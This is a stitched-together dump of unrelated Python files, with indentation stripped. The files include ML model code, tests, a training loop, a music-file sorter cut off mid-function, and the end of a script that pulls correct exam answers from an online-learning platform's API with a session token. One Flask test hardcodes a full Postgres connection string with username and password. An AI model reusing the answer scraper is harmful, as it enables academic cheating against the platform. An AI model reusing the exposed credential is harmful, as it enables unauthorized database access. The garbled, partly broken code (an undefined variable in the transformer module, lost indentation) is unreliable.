res_header =session.get(uri_header, headers={"UA-AUTHORIZATION": token})
res_header=res_header.text
# soup = BeautifulSoup(res_header,'html.parser')
# print(res_header)
examuser_id = re.findall('examuserid=(\d+)',res_header)
paper_original = re.findall('paperID: "(\d+)"',res_header)
exam_original = re.findall('examId: "(\d+)"',res_header)
uri_header="https://www.ulearning.cn/umooc/user/study.do?operation=examReport&examid=33716&examuserid="+examuser_id[i]
# print(uri_header)
# print(examuser_id)
# print(paper_original)
# print(exam_original)
uri_answer="https://www.ulearning.cn/umooc/learner/exam.do?operation=getCorrectAnswer&paperID="+paper_original[0]+"&examID="+exam_original[0]
# print(uri_answer)
uri_paper= "https://www.ulearning.cn/umooc/learner/exam.do?operation=getPaperForStudent&paperID="+paper_original[0]+"&examId="+exam_original[0] +"&userId=7753979"
# print(uri_paper)
res_paper = session.get(uri_paper, headers={"UA-AUTHORIZATION": token})
res_answer = session.get(uri_answer, headers={"UA-AUTHORIZATION": token})
res_paper=res_paper.text
res_answer = res_answer.text
# question_id = re.findall('"questionid":(\d+)',res_paper)
children_id = re.findall('"questionid":(\d+),"score":\d,"title":"(.*?)"',res_paper)
answer_id = re.findall('"(\d+)":{"correctAnswer":"(.*?)"',res_answer)
number=0
# print(children_id)
# print(answer_id)
# print(len(question_id))
while number < 75:
qid = children_id[number][0]
qtitle=children_id[number][-1]
qtitle= qtitle.replace("\n","")
qtitle= qtitle.replace(",","")
correctid = answer_id[number][0]
correctAnswer = answer_id[number][1]
                print('Question ID: {}, Title: {}, Answer ID: {}, Answer: {}'.format(qid,qtitle,correctid,correctAnswer))
f.write("{},{},{},{}\n".format(qid,qtitle,correctid,correctAnswer))
number += 1
# print(res_paper)
# print (res_answer)
i += 1
f.close()
def main():
if not login():
main()
else:
print_user_info()
work()
if __name__ == '__main__':
main()
| 3,632 |
fastgc/model/ctransformer.py
|
ppmlguy/fastgradclip
| 2 |
2172361
|
import torch
import torch.nn as nn
from fastgc.layers.linear import Linear
from fastgc.layers.transformer import PositionalEncoding
from fastgc.layers.transformer import TransformerEncoder
from fastgc.layers.transformer import TransformerEncoderLayer
class TransformerModel(nn.Module):
def __init__(self, n_token, n_classes, d_model=512, n_layers=2,
n_head=8, n_hidden=2048, dropout=0.1, max_seq_len=512,
embeddings=None, train_alg='batch'):
super(TransformerModel, self).__init__()
self.train_alg = train_alg
self.d_model = d_model
self.n_head = n_head
if embeddings is None:
self.token_embedding = nn.Embedding(n_token, d_model)
else:
self.token_embedding = nn.Embedding.from_pretrained(embeddings)
self.token_embedding.weight.requires_grad = False
self.pos_encoder = PositionalEncoding(d_model, dropout, max_seq_len)
encoder_layers = TransformerEncoderLayer(d_model, n_head, n_hidden, dropout)
# encoder_norm = nn.LayerNorm(d_model)
encoder_norm = None
self.encoder = TransformerEncoder(encoder_layers, n_layers, encoder_norm)
self.fc= Linear(d_model, n_classes)
def init_weights(self):
initrange = 0.1
self.token_embedding.weight.data.uniform_(-initrange, initrange)
self.fc.bias.data.zero_()
self.fc.weight.data.uniform_(-initrange, initrange)
def forward(self, x):
# positions = torch.arange(len(x), device=x.device).unsqueeze(-1)
x = x.transpose(0, 1)
# [sentence length, batch_size]
x = self.token_embedding(x)
# [sentence length, batch_size, embedding dim]
x = self.pos_encoder(x)
# x = x + self.pos_encoder(positions).expand_as(x)
# [sentence length, batch_size, embedding dim]
output = self.encoder(x)
# [sentence length, batch_size, embedding dim]
avg_out = output.transpose(0, 1).mean(dim=1)
# [batch_size, embedding dim]
preact = self.fc(avg_out)
# [batch_size, num_classes]
# return F.log_softmax(output, dim=-1)
return preact
def per_example_gradient(self, loss):
grads = []
pre_acts = []
pre_acts.extend(self.encoder.collect_preactivations())
pre_acts.append(self.fc.pre_activation)
pre_acts = [m.pre_activ for m in modules]
Z_grad = torch.autograd.grad(loss, pre_acts, retain_graph=True)
for m, zgrad in zip(modules, Z_grad):
m.save_grad(zgrad)
# loss.backward(retain_graph=True)
# TransformerEncoder
grads.extend(self.encoder.per_example_gradient())
# fully connected layer
grads.extend(self.fc.per_example_gradient())
return grads
def pe_grad_norm(self, loss, batch_size, device):
grad_norm = torch.zeros(batch_size, device=device)
pre_acts = []
pre_acts.extend(self.encoder.collect_preactivations())
pre_acts.append(self.fc.pre_activation)
Z_grad = torch.autograd.grad(loss, pre_acts, retain_graph=True)
grad_norm.add_(self.encoder.pe_grad_sqnorm(Z_grad[:-1]))
grad_norm.add_(self.fc.pe_grad_sqnorm(Z_grad[-1]))
grad_norm.sqrt_()
return grad_norm
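# --- Illustrative usage (appended sketch, not part of the original module) ---
# A minimal forward-pass check with hypothetical sizes (vocabulary of 1000
# tokens, 2 classes, a batch of 4 sequences of length 16). forward() expects
# integer token ids shaped [batch_size, sentence length] and returns one
# pre-activation score per class.
if __name__ == '__main__':
    model = TransformerModel(n_token=1000, n_classes=2, d_model=64,
                             n_layers=1, n_head=4, n_hidden=128)
    tokens = torch.randint(0, 1000, (4, 16))
    logits = model(tokens)
    print(logits.shape)  # expected: torch.Size([4, 2])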
| 3,377 |
ontology_learning/data_type/knowledge_graph/knowledge_graph_edge.py
|
jromero132/bachelor_thesis_code
| 0 |
2173167
|
from ontology_learning.utils.hash import get_hash
class KnowledgeGraphEdge(object):
def __init__(self, node, label):
self.node = node
self.label = label
def __repr__(self):
return f"KnowledgeGraphEdge(node={self.node}, label={self.label})"
def __str__(self):
return self.__repr__()
def __eq__(self, other):
return self.node == other.node and self.label == other.label
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return get_hash(self.__repr__())
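# --- Illustrative usage (appended sketch, not part of the original module) ---
# Hypothetical node and label values: two edges with the same node and label
# compare equal and hash identically, so they collapse to one element in a set.
if __name__ == '__main__':
    e1 = KnowledgeGraphEdge(node='paris', label='capital_of')
    e2 = KnowledgeGraphEdge(node='paris', label='capital_of')
    e3 = KnowledgeGraphEdge(node='paris', label='located_in')
    print(e1 == e2)           # True
    print(e1 != e3)           # True
    print(len({e1, e2, e3}))  # 2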
| 502 |
tests/test_ridgepaths.py
|
vishalbelsare/torch-gel
| 37 |
2173096
|
"""test_ridgepaths.py: tests for ridge_paths function."""
import itertools
import unittest
import torch
from scipy.spatial.distance import cosine
from gel.ridgepaths import ridge_paths
class TestRidgePathsEmptySupport(unittest.TestCase):
"""Test ridge_paths with empty support."""
def test_ridge_paths_empty_support(self):
ls = range(5)
summaries = ridge_paths(None, None, None, ls, lambda _, b: b)
self.assertCountEqual(ls, summaries.keys())
for l in ls:
self.assertIsNone(summaries[l])
class TestRidgePathsBase:
"""Base class for ridge_paths tests."""
lambdas = [0.001, 0.01, 0.1, 1.0, 10.0, 100.0, 1000.0]
def __init__(self, device, dtype, m, p, *args, **kwargs):
super().__init__(*args, **kwargs)
self.device = device
self.dtype = dtype
self.m = m
self.p = p
self.support = 1 # this is ignored
def setUp(self):
if self.device.type == "cuda" and not torch.cuda.is_available():
raise unittest.SkipTest("cuda unavailable")
self.X = torch.randn(self.p, self.m, device=self.device, dtype=self.dtype)
self.y = torch.randn(self.m, device=self.device, dtype=self.dtype)
def test_against_naive(self):
"""Compare with directly obtained solution."""
# pylint: disable=no-member
summaries = ridge_paths(
self.X, self.y, self.support, self.lambdas, lambda _, b: b
)
# Compare each b with the naive solution.
I = torch.eye(self.X.shape[0], device=self.device, dtype=self.dtype)
Q = self.X @ self.X.t()
r = self.X @ self.y
for l, b in summaries.items():
b_naive = torch.inverse(Q + l * I) @ r
self.assertAlmostEqual(
cosine(b.cpu().numpy(), b_naive.cpu().numpy()), 0, places=2
)
def create_ridgepaths_test(device_name, dtype, m, p):
device = torch.device(device_name)
def __init__(self, *args, **kwargs):
TestRidgePathsBase.__init__(self, device, dtype, m, p, *args, **kwargs)
_doc = "Test ridge_paths on {} with {} ({}x{})".format(device_name, dtype, m, p)
test_name = "TestRidgePaths" + device_name.upper() + str(dtype)[-2:]
test_name += "_{}x{}".format(m, p)
globals()[test_name] = type(
test_name,
(TestRidgePathsBase, unittest.TestCase),
{"__init__": __init__, "__doc__": _doc},
)
for _device_name, _dtype, _m, _p in itertools.product(
["cpu", "cuda"], [torch.float32, torch.float64], [1, 10], [1, 5, 10, 20]
):
create_ridgepaths_test(_device_name, _dtype, _m, _p)
| 2,642 |
graphgym/contrib/train/train_with_adj.py
|
xnhp/GraphGym
| 0 |
2172218
|
import logging
import time
import torch
from graphgym.checkpoint import load_ckpt, save_ckpt, clean_ckpt
from graphgym.config import cfg
from graphgym.loss import compute_loss
from graphgym.register import register_train
from graphgym.utils.epoch import is_ckpt_epoch
def train_epoch(logger, loader, model, optimizer, scheduler):
model.train()
time_start = time.time()
for batch in loader:
optimizer.zero_grad()
batch.to(torch.device(cfg.device))
pred, true = model(batch)
loss_ret = compute_loss(pred, true, batch)
if len(loss_ret) == 2:
total_loss, pred_score = loss_ret
loss_main = torch.tensor(0)
loss_reg = torch.tensor(0)
else:
total_loss, pred_score, loss_main, loss_reg = loss_ret
total_loss.backward()
optimizer.step()
logger.update_stats(true=true.detach().cpu(),
pred=pred_score.detach().cpu(),
loss=total_loss.item(),
lr=scheduler.get_last_lr()[0],
time_used=time.time() - time_start,
params=cfg.params,
loss_main=loss_main.item(),
loss_reg=loss_reg.item())
time_start = time.time()
scheduler.step()
def eval_epoch(logger, loader, model):
model.eval()
time_start = time.time()
for batch in loader:
batch.to(torch.device(cfg.device))
pred, true = model(batch)
loss_ret = compute_loss(pred, true, batch)
if len(loss_ret) == 2: # todo duplicate code: unpacking of loss values
total_loss, pred_score = loss_ret
            # Match train_epoch: use zero tensors so the .item() calls below do not fail.
            loss_main = torch.tensor(0)
            loss_reg = torch.tensor(0)
else:
total_loss, pred_score, loss_main, loss_reg = loss_ret
logger.update_stats(true=true.detach().cpu(),
pred=pred_score.detach().cpu(),
loss=total_loss.item(),
lr=0,
time_used=time.time() - time_start,
params=cfg.params,
loss_main=loss_main.item(),
loss_reg=loss_reg.item())
time_start = time.time()
def train_with_adj(loggers, loaders, model, optimizer, scheduler):
start_epoch = 0
if cfg.train.auto_resume:
start_epoch = load_ckpt(model, optimizer, scheduler)
if start_epoch == cfg.optim.max_epoch:
logging.info('Checkpoint found, Task already done')
else:
logging.info('Start from epoch {}'.format(start_epoch))
num_splits = len(loggers)
for cur_epoch in range(start_epoch, cfg.optim.max_epoch):
# train and evaluate on train split
train_epoch(loggers[0], loaders[0], model, optimizer, scheduler)
loggers[0].write_epoch(cur_epoch, loaders[0])
if is_ckpt_epoch(cur_epoch):
save_ckpt(model, optimizer, scheduler, cur_epoch)
for logger in loggers:
logger.close()
if cfg.train.ckpt_clean:
clean_ckpt()
logging.info('Task done, results saved in {}'.format(cfg.out_dir))
register_train('train_with_adj', train_with_adj)
| 3,256 |
galeria/__init__.py
|
spanasik/django-galeria
| 0 |
2171727
|
VERSION = (0, 4, 12)
def get_version():
"""Returns the version as a human-format string.
"""
return '.'.join([str(i) for i in VERSION])
__author__ = 'See the file AUTHORS'
__license__ = 'BSD License'
__url__ = 'https://bitbucket.org/semente/django-gallery'
__version__ = get_version()
| 301 |
data/tensorflow/src/2_9_using_variable.py
|
friendlyantz/learning
| 1 |
2171172
|
import tensorflow as tf
sess = tf.InteractiveSession()
raw_data = [1., 2., 8., -1, 0., 5.5, 6., 13]
spike = tf.Variable(False)
spike.initializer.run()
for i in range(1, len(raw_data)):
if raw_data[i] - raw_data[i-1] > 5:
updater = tf.assign(spike, True)
updater.eval()
else:
tf.assign(spike, False).eval()
print("Spike", spike.eval())
sess.close()
| 388 |
tests/test.py
|
mrahman013/Hope4Hops-web-applcation
| 0 |
2172427
|
""" Unit and intergation tests """
import unittest
import hopsapp
from hopsapp import app
from bs4 import BeautifulSoup
from hopsapp.routes import distance
class TestUnitHopsapp(unittest.TestCase):
""" Unit test class """
def setUp(self):
"""
setup for unit test
"""
hopsapp.app.config['TESTING'] = True
self.app = hopsapp.app.test_client()
self.response = self.app.get("/")
def test_home(self):
""" test home status code """
response = self.app.get('/')
self.assertEqual(response.status_code, 200)
#self.assertIn('home', response.data)
def test_about(self):
""" test about page status code """
response = self.app.get('/about')
self.assertEqual(response.status_code, 200)
#self.assertIn('about', response.data)
def test_login(self):
""" test login page status code """
response = self.app.get('/login')
self.assertEqual(response.status_code, 200)
#self.assertIn('login', response.data)
def test_register(self):
""" test register page status code """
response = self.app.get('/register')
self.assertEqual(response.status_code, 200)
#self.assertIn('register', response.data)
def test_beerprofile(self):
""" test beerprofile page status code """
response = self.app.get('/beerprofile?name=Boat')
self.assertEqual(response.status_code, 200)
# self.assertIn('beerprofile', response.data)
def test_breweryprofile(self):
""" test breweryprofile status code """
response = self.app.get('/breweryprofile?name=Carton Brewing Company')
self.assertEqual(response.status_code, 200)
# self.assertIn('breweryprofile', response.data)
def test_storeprofile(self):
""" test storeprofile page status code """
response = self.app.get('/storeprofile?name=Good Beer')
self.assertEqual(response.status_code, 200)
# self.assertIn('storeprofile', response.data)
def test_contact(self):
""" test contact page status code """
response = self.app.get('/contact')
self.assertEqual(response.status_code, 200)
def test_distance_func(self):
""" testing distance function """
self.assertEqual(6.6, distance(40.8200471, -73.9514611, 40.727588, -73.983858))
def test_config_debug(self):
""" testing debug config is true """
assert app.config['DEBUG'] is True
def test_configdb_uri(self):
""" testing DB uri """
assert app.config['SQLALCHEMY_DATABASE_URI'] == 'postgres://yjjuylsytqewni:d0d63322c6abd33e2dadeafd7ef2501f73af54cf2d39596e464ea2c18b0234a3@ec2-23-23-78-213.compute-1.amazonaws.com:5432/d3gdnt7fkmonn1'
def test_config_trackmodification(self):
""" testing trackmodification config is true """
assert app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] is True
def test_error_400(self):
""" test error status """
response = self.app.get('/400')
self.assertEqual(response.status_code, 404)
# self.assertIn('400', response.data)
def test_error_405(self):
""" test error status """
response = self.app.get('/405')
self.assertEqual(response.status_code, 404)
# self.assertIn('405', response.data)
def test_error_500(self):
""" test error status """
response = self.app.get('/500')
self.assertEqual(response.status_code, 404)
# self.assertIn('500', response.data)
class TestIntegration(unittest.TestCase):
""" Integration test class """
def setUp(self):
""" setup for integration test """
hopsapp.app.config['TESTING'] = True
self.app = hopsapp.app.test_client()
self.response = self.app.get("/")
self.soup = BeautifulSoup(self.response.data, 'html.parser')
def test_home_beer_name(self):
""" testing if home is getting beer name from database and
showing on page when page load
"""
response = self.app.get('/')
self.assertIn(b'HEADY TOPPER', response.data)
def test_home_brewery_name(self):
"""
testing if home is getting Brewery name from database
and showing on page when page load
"""
response = self.app.get('/')
self.assertIn(b'CARTON', response.data)
def test_home_beer_style(self):
"""
testing if home is getting beer style from database
and showing on page when page load
"""
response = self.app.get('/')
self.assertIn(b'ALE', response.data)
def test_homebeer_abv(self):
"""
testing if home is getting beer ABV from database
and showing on page when page load
"""
response = self.app.get('/')
self.assertIn(b'6.00%', response.data)
def test_home_beer_rating(self):
"""
testing if home is getting beer rating from database
and showing on page when page load
"""
response = self.app.get('/')
self.assertIn(b'0.0', response.data)
def test_home_beer_rarity(self):
"""
testing if home is getting beer rarity from database
and showing on page when page load
"""
response = self.app.get('/')
self.assertIn(b'COMMON', response.data)
if __name__ == '__main__':
unittest.main()
| 5,469 |
miniml/net.py
|
oniani/miniml
| 3 |
2172994
|
import miniml.tensor as T
import miniml.loss as L
class Model:
def __init__(self):
self._layers: list = []
self._loss: list = []
def add_layer(self, layer):
"""Add a network layer to the model."""
self._layers.append(layer)
def epoch(self, x, y, lr: float):
"""One full epoch."""
# Forward pass through the network
# NOTE: loop by index is needed for saving results
forward: T.Tensor = x
for idx, _ in enumerate(self._layers):
forward = self._layers[idx].forward(x)
x = forward
# Compute loss and first gradient
mse = L.MeanSquaredError(T.Ops.reshape(forward, y.shape), y)
# print(forward.shape, y.shape)
error = mse.forward()
gradient = mse.backward()
self._loss.append(error)
# Backpropagation
for idx, _ in reversed(list(enumerate(self._layers))):
if self._layers[idx].type == "Linear":
gradient, dW, db = self._layers[idx].backward(gradient)
self._layers[idx].optimize(dW, db, lr)
else:
gradient = self._layers[idx].backward(gradient)
return error
def train(self, x_train, y_train, lr: float, epochs: int) -> None:
"""Train the model."""
for epoch in range(epochs):
loss = self.epoch(x_train, y_train, lr)
if epoch % 25 == 0:
print(f"Epoch: {epoch} | Loss: {loss}")
def predict(self, x: T.Tensor) -> T.Tensor:
"""Predict by performing a forward pass on a trained network."""
forward: T.Tensor = x
for idx, _ in enumerate(self._layers):
forward = self._layers[idx].forward(x)
x = forward
return forward
| 1,794 |
book_search/es/documents.py
|
yakky/microservice-talk
| 0 |
2173136
|
from elasticsearch_dsl import Document, InnerDoc, Integer, Keyword, Nested, Text
class Author(InnerDoc):
    name = Text()
class Tag(InnerDoc):
    title = Text()
    slug = Keyword()
class Book(Document):
book_id = Integer()
isbn = Keyword()
isbn13 = Keyword()
authors = Nested(Author)
original_publication_year = Integer()
original_title = Text()
title = Text()
language_code = Keyword()
small_image_url = Keyword()
tags = Nested(Tag)
class Index:
name = "book"
| 520 |
10 Days of Statistics/27 - Day 9 - Multiple Linear Regression.py
|
srgeyK87/Hacker-Rank-30-days-challlenge
| 275 |
2170024
|
# ========================
# Information
# ========================
# Direct Link: https://www.hackerrank.com/challenges/s10-multiple-linear-regression/problem
# Difficulty: Medium
# Max Score: 30
# Language: Python
# ========================
# Solution
# ========================
from sklearn import linear_model
M, N = list(map(int, input().strip().split()))
X = [0]*N
Y = [0]*N
for i in range(N):
inp = list(map(float, input().strip().split()))
X[i] = inp[:-1]
Y[i] = inp[-1]
LM = linear_model.LinearRegression()
LM.fit(X, Y)
A = LM.intercept_
B = LM.coef_
Q = int(input())
for i in range(Q):
f = list(map(float, input().strip().split()))
Y = A + sum([B[j] * f[j] for j in range(M)])
print(round(Y, 2))
| 752 |
unnamed/events/init.py
|
kcomain/unnamed-launcher
| 0 |
2171915
|
# Copyright (c) 2021 kcomain and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PySide6.QtCore import QDir
from PySide6.QtCore import QRegularExpression as QRe
from PySide6.QtGui import QRegularExpressionValidator as QReV
from PySide6.QtWidgets import QCompleter, QFileSystemModel
from ..helpers import get_version
from . import BaseEvents
URL_RE = QRe(r"^https?://.+\..{1,63}(/.*)*$")
URL_REV = QReV(URL_RE)
FS_MODEL = QFileSystemModel()
FS_MODEL.setRootPath(QDir.currentPath())
class InitEvents(BaseEvents):
def populate_labels(self):
self.window.info_version.setText(get_version())
def set_validators(self):
self.window.thcrap_starting_text.setValidator(URL_REV)
self.logger.debug("validators set")
def set_completer(self):
np2_completer = QCompleter(FS_MODEL)
thc_completer = QCompleter(FS_MODEL)
np2_completer.setCompletionMode(QCompleter.PopupCompletion)
thc_completer.setCompletionMode(QCompleter.PopupCompletion)
self.window.np2_location_text.setCompleter(np2_completer)
self.window.thcrap_text.setCompleter(thc_completer)
self.logger.debug("completers set")
def run_all(self):
self.populate_labels()
self.set_validators()
self.set_completer()
| 2,323 |
pycolfin/cli.py
|
patpatpatpatpat/pycolfin
| 2 |
2172005
|
# -*- coding: utf-8 -*-
import os
from getpass import getpass
import click
from .pycolfin import COLFin
verbosity_help = """
1 = User ID, Last Login
2 = Display all info from 1 and portfolio summary
3 = Display all info in 1 & 2 and detailed portfolio
"""
use_env_vars_help = """
Use USER_ID and PASSWORD from environment variables.
Not recommended if you are using a shared computer!
(This is like storing bank credentials in a text file)
"""
@click.command()
@click.option('--use-env-vars', is_flag=True, default=False, help=use_env_vars_help)
@click.option('-v', '--verbosity', default=3, type=click.IntRange(1, 3), help=verbosity_help)
def main(verbosity, use_env_vars):
if use_env_vars:
try:
user_id = os.environ['USER_ID']
            password = os.environ['PASSWORD']
except KeyError:
click.echo('USER_ID and PASSWORD not found in environment variables!')
exit()
else:
user_id = getpass(prompt='User ID:')
        password = getpass(prompt='Password:')
try:
account = COLFin(user_id, password, parser='html.parser')
except Exception as e:
click.echo(e.__str__())
exit()
if verbosity >= 1:
account.fetch_account_summary()
if verbosity >= 2:
account.fetch_portfolio_summary()
account.show_portfolio_summary()
if verbosity == 3:
account.fetch_detailed_portfolio()
try:
account.show_detailed_stocks()
except Exception as e:
print(e)
try:
account.show_detailed_mutual_fund()
except Exception as e:
print(e)
account.show_account_summary()
if __name__ == "__main__":
main()
| 1,719 |
data_analysis/recursive_mean.py
|
antonvs88/crowddynamics-research
| 0 |
2172874
|
import numpy as np
def recursive_mean(data, chunk):
"""
Calculate mean of data array recursively by averaging a "chunk" of the data.
Parameters
----------
data : array, float
Input data
chunk : integer
Size of chunk
Returns
-------
time_sample_average : array
Data array averaged over time.
"""
# Return the largest integer smaller or equal to the division of the first dimension of data array and chunk size.
divider = np.floor_divide(data.shape[0], chunk)
# Computes the remainder complementary to the floor_divide function.
remainder = np.remainder(data.shape[0], chunk)
# Initialize array that is returned.
time_sample_average = np.zeros((data.shape[1], data.shape[2]), dtype=np.float16)
    # Calculate the mean of the data array recursively by averaging one "chunk" at a time.
for zzz in range(0,divider+1):
        # If only the remainder is left, take the average of the remainder.
if zzz == divider:
if remainder == 0:
break
elif remainder == 1:
temp_mean = data[chunk * zzz + remainder - 1, :, :]
else:
                temp_mean = np.mean(data[chunk * zzz:chunk * zzz + remainder, :, :], axis=0, dtype=np.float16)
time_sample_average = (time_sample_average * chunk * zzz + temp_mean * remainder) /\
(chunk * zzz + remainder)
else:
if chunk == 1:
temp_mean = data[chunk * zzz, :, :]
else:
                temp_mean = np.mean(data[chunk * zzz:chunk * (zzz+1), :, :], axis=0, dtype=np.float16)
time_sample_average = (time_sample_average * chunk * zzz + temp_mean * chunk) / \
(chunk * (zzz + 1))
return time_sample_average
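
# Usage sketch (illustrative, not part of the original module): average a random
# (T, H, W) array in chunks of 100 time steps and compare against a direct
# np.mean. The array shape and chunk size are arbitrary assumptions.
if __name__ == "__main__":
    rng = np.random.default_rng(0)
    sample = rng.random((1050, 4, 4)).astype(np.float16)
    approx = recursive_mean(sample, chunk=100)
    exact = sample.astype(np.float64).mean(axis=0)
    # float16 accumulation makes the recursive result approximate, so compare loosely.
    print(np.max(np.abs(approx.astype(np.float64) - exact)))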
| 1,869 |
7_funktionen/1_drawBotFunktionen.py
|
Coding-for-the-Arts/drawbot-samples
| 0 |
2172766
|
"""
DrawBot functions
"""
newPage("1000, 1000")
oval(200, 200, 600, 600)
saveImage("~/Desktop/myImage.pdf")
"""
These are examples of functions that exist only in DrawBot,
but not in plain Python.
You can find information about them in the DrawBot documentation:
https://www.drawbot.com/
"""
| 301 |
multi_fetch_gazebo/scripts/simple_launch.py
|
565353780/multi-fetch-ros
| 0 |
2173131
|
import roslaunch
import rospy
world_name = "world_name:=$(find multi_fetch_gazebo)/worlds/big_livingroom.world"
robot_num = "robot_num:=3"
uuid = roslaunch.rlutil.get_or_generate_uuid(None, False)
roslaunch.configure_logging(uuid)
vpp_cli_args = [
"multi_fetch_gazebo",
"multi_fetch_with_vpp.launch",
world_name,
robot_num,
]
vpp_roslaunch_file = roslaunch.rlutil.resolve_launch_arguments(vpp_cli_args)[0]
vpp_roslaunch_args = vpp_cli_args[2:]
virtual_scan_server_cli_args = ["virtual_scan", "virtual_scan_server.launch"]
virtual_scan_server_roslaunch_file = roslaunch.rlutil.resolve_launch_arguments(
virtual_scan_server_cli_args
)[0]
occupancy_grid_server_cli_args = [
"occupancy_grid_server",
"occupancy_grid_server.launch",
]
occupancy_grid_server_roslaunch_file = roslaunch.rlutil.resolve_launch_arguments(
occupancy_grid_server_cli_args
)[0]
grnet_service_cli_args = ["grnet_detect", "grnet_service.launch"]
grnet_service_roslaunch_file = roslaunch.rlutil.resolve_launch_arguments(
grnet_service_cli_args
)[0]
PointCloud2ToObjectVecConverterServer_cli_args = [
"pointcloud2_to_object_vec_converter",
"PointCloud2ToObjectVecConverterServer.launch",
]
PointCloud2ToObjectVecConverterServer_roslaunch_file = (
roslaunch.rlutil.resolve_launch_arguments(
PointCloud2ToObjectVecConverterServer_cli_args
)
)[0]
ViewPointExtractorServer_cli_args = [
"view_point_extractor",
"ViewPointExtractorServer.launch",
]
ViewPointEcxtractorServer_roslaunch_file = roslaunch.rlutil.resolve_launch_arguments(
ViewPointExtractorServer_cli_args
)[0]
launch_files = [
(vpp_roslaunch_file, vpp_roslaunch_args),
virtual_scan_server_roslaunch_file,
occupancy_grid_server_roslaunch_file,
grnet_service_roslaunch_file,
PointCloud2ToObjectVecConverterServer_roslaunch_file,
ViewPointEcxtractorServer_roslaunch_file,
]
uuid = roslaunch.rlutil.get_or_generate_uuid(None, False)
launch = roslaunch.parent.ROSLaunchParent(uuid, launch_files)
launch.start()
rospy.loginfo("started")
# rospy.sleep()
# 3 seconds later
# launch.shutdown()
try:
launch.spin()
finally:
# After Ctrl+C, stop all nodes from running
launch.shutdown()
| 2,219 |
unmapped/wrapper.py
|
avilab/vs-wrappers
| 1 |
2173279
|
from snakemake.shell import shell
reformat_fastq_extra = snakemake.params.get("reformat_fastq_extra", "")
reformat_fasta_extra = snakemake.params.get("reformat_fasta_extra", "")
extra = snakemake.params.get("extra", "")
# Preprocessing command to run.
commands = [
"reformat.sh in={snakemake.input} out={snakemake.output.fastq} unmappedonly primaryonly {reformat_fastq_extra}",
"reformat.sh in={snakemake.output.fastq} out={snakemake.output.fasta} {reformat_fasta_extra}",
]
# Run preprocessing commands.
for cmd in commands:
shell(cmd)
| 552 |
vision_opencv/opencv_tests/launch/view_img.py
|
zhj-buffer/ROS2-driver-for-Realsense
| 0 |
2169994
|
from launch.legacy.exit_handler import default_exit_handler, restart_exit_handler
from ros2run.api import get_executable_path
def launch(launch_descriptor, argv):
ld = launch_descriptor
package = 'image_tools'
ld.add_process(
cmd=[get_executable_path(package_name=package, executable_name='showimage'),
'-t', '/opencv_tests/images'],
name='showimage',
exit_handler=restart_exit_handler,
)
package = 'opencv_tests'
ld.add_process(
cmd=[get_executable_path(package_name=package, executable_name='source.py')],
name='source.py',
exit_handler=restart_exit_handler,
)
return ld
| 664 |
finder.py
|
araneforseti/newItemFinderScript
| 0 |
2172074
|
#!/usr/bin/python
import sys
def create_list_from_file(file, separator):
new_list = []
with open(file, "r") as ins:
for line in ins:
split = line.split(separator)
if len(split) > 1:
new_list.append(split[1])
return new_list
if len(sys.argv) != 3:
    print(len(sys.argv))
    print(sys.argv)
sys.exit("Usage: python finder.py <potentialAdditionalList> <knownItemsList>")
potentialItems = create_list_from_file(sys.argv[1], "|")
knownItems = create_list_from_file(sys.argv[2], ",")
newItems = list(set(potentialItems) - set(knownItems))
print "%s new items found" % len(newItems)
for item in newItems:
    print(item)
| 649 |
songsort.py
|
afeldman/songsort
| 0 |
2170926
|
#!/usr/bin/python
import os
import sys
import shutil
from tinytag import TinyTag
import argparse
import fnmatch
import uuid
parser = argparse.ArgumentParser()
parser.add_argument("--verbosity", default=0, help="increase output verbosity", type=int)
parser.add_argument("--destination", help="Destination Path")
parser.add_argument("--source", help="Source Path")
args = parser.parse_args()
dest = args.destination
src = args.source
vlevel = args.verbosity
if not os.path.exists(src):
sys.stderr("source path does not exists!!!")
if not os.path.exists(dest):
os.mkdir(dest)
if vlevel > 1:
print("create destination")
mp3files = []
for root, dirs, files in os.walk(src):
for name in fnmatch.filter(files, "*.mp3"):
mp3files.append(os.path.join(root, name))
if vlevel > 1:
print(os.path.join(root, name))
for name in fnmatch.filter(files, "*.Mp3"):
mp3files.append(os.path.join(root, name))
if vlevel > 1:
print(os.path.join(root, name))
for name in fnmatch.filter(files, "*.MP3"):
mp3files.append(os.path.join(root, name))
if vlevel > 1:
print(os.path.join(root, name))
for name in fnmatch.filter(files, "*.mP3"):
mp3files.append(os.path.join(root, name))
if vlevel > 1:
print(os.path.join(root, name))
break
if len(mp3files) == 0:
sys.stderr("Error no mp3 file!")
for mp3file in mp3files:
if vlevel > 1:
print('mp3 file path %s' % mp3file)
try:
tag = TinyTag.get(mp3file)
if vlevel > 2:
print('This track is by %s.' % tag.artist)
print('It is %f seconds long.' % tag.duration)# duration of the song in seconds
print('The album name is %s' % tag.album) # album as string
print('Audio offset %f' % tag.audio_offset) # number of bytes before audio data begins
print('bitrate %f' % tag.bitrate) # bitrate in kBits/s
print('Filesize %f' % tag.filesize) # file size in bytes
print('genre %s' % tag.genre) # genre as string
print('sample rate %f' % tag.samplerate) # samples per second
print('title %s' % tag.title) # title of the song
print('track %s' % tag.track) # track number as string
print('title %s' % str(tag.track_total)) # total number of tracks as string
print('year %s' % str(tag.year)) # year or data as string
if not tag.genre:
tag.genre = "no genre"
if not tag.artist:
tag.artist = "various"
if not tag.album:
tag.album = "no album"
gerpath = os.path.join(dest, tag.genre)
artpath = os.path.join(gerpath, tag.artist)
albpath = os.path.join(artpath, tag.album)
if not os.path.exists(gerpath):
os.mkdir(gerpath)
os.mkdir(artpath)
os.mkdir(albpath)
